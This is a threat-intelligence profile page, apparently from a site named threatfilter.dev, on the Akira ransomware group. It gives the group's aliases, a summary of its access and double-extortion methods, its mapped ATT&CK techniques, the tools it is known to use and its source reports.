← threatfilter.dev / all groups / Akira
Akira
Also known as: GOLD SAHARA · PUNK SPIDER · Howling Scorpius
Overview
Akira is a ransomware variant and ransomware deployment entity active since at least March 2023. Akira uses compromised credentials to access single-factor external access mechanisms such as VPNs for initial access, then various publicly-available tools and techniques for lateral movement. Akira operations are associated with "double extortion" ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Technical analysis of Akira ransomware indicates variants capable of targeting Windows or VMWare ESXi hypervisors and multiple overlaps with Conti ransomware.
Capabilities
- Custom malware/implant development — ATT&CK: 3 attributed custom malware families
TTPs — 17 techniques across 11 tactics
Execution
-
T1059.001PowerShell
Persistence
-
T1133External Remote Services
Stealth
-
T1027.001Binary Padding -
T1036.005Match Legitimate Resource Name or Location -
T1078Valid Accounts
Defense Impairment
-
T1685Disable or Modify Tools
Credential Access
Discovery
-
T1018Remote System Discovery -
T1482Domain Trust Discovery
Lateral Movement
-
T1021.001Remote Desktop Protocol
Collection
-
T1213.002Sharepoint -
T1560.001Archive via Utility
Command and Control
-
T1219Remote Access Tools
Exfiltration
-
T1567.002Exfiltration to Cloud Storage
Impact
-
T1486Data Encrypted for Impact -
T1531Account Access Removal -
T1657Financial Theft
Tools & malware (8)
Mimikatz · PsExec · AdFind · Akira _v2 · Akira · Megazord · LaZagne · Rclone
Reporting (3)
- Threat Assessment: Howling Scorpius (Akira Ransomware) — Zemah, Y
- Akira ransomware continues to evolve — Nutland, J. and Szeliga, M
- #StopRansomware: Akira Ransomware — CISA et al